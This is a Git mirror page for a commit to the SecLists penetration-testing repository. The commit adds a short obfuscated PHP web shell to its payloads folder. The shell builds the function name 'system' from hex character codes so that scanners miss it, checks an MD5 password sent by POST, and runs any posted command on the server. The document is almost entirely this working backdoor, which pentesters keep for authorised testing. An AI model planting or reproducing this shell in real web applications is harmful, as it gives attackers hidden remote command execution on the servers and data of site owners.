mirror of
https://github.com/danielmiessler/SecLists.git
synced 2025-07-18 01:39:18 -04:00
Merge pull request #122 from q-analysis/patch-1
Added An Obfuscation Shell
This commit is contained in:
commit
2f92098370
1 changed files with 22 additions and 0 deletions
22
Payloads/laudanum-0.8/obfuscated_phpshell
Normal file
22
Payloads/laudanum-0.8/obfuscated_phpshell
Normal file
|
@ -0,0 +1,22 @@
|
|||
<?php
|
||||
|
||||
$pass = "9cdfb439c7876e703e307864c9167a15"; //lol
|
||||
|
||||
$A = chr(0x73);
|
||||
$B = chr(0x79);
|
||||
$X = chr(0x74);
|
||||
$D = chr(0x65);
|
||||
$E = chr(0x6d);
|
||||
|
||||
$hook = $A.$B.$A.$X.$D.$E;
|
||||
|
||||
if($pass == md5($_POST['password']))
|
||||
{
|
||||
$hook($_POST['cmd']);
|
||||
}
|
||||
else
|
||||
{
|
||||
die();
|
||||
}
|
||||
|
||||
?>
|
Loading…
Add table
Reference in a new issue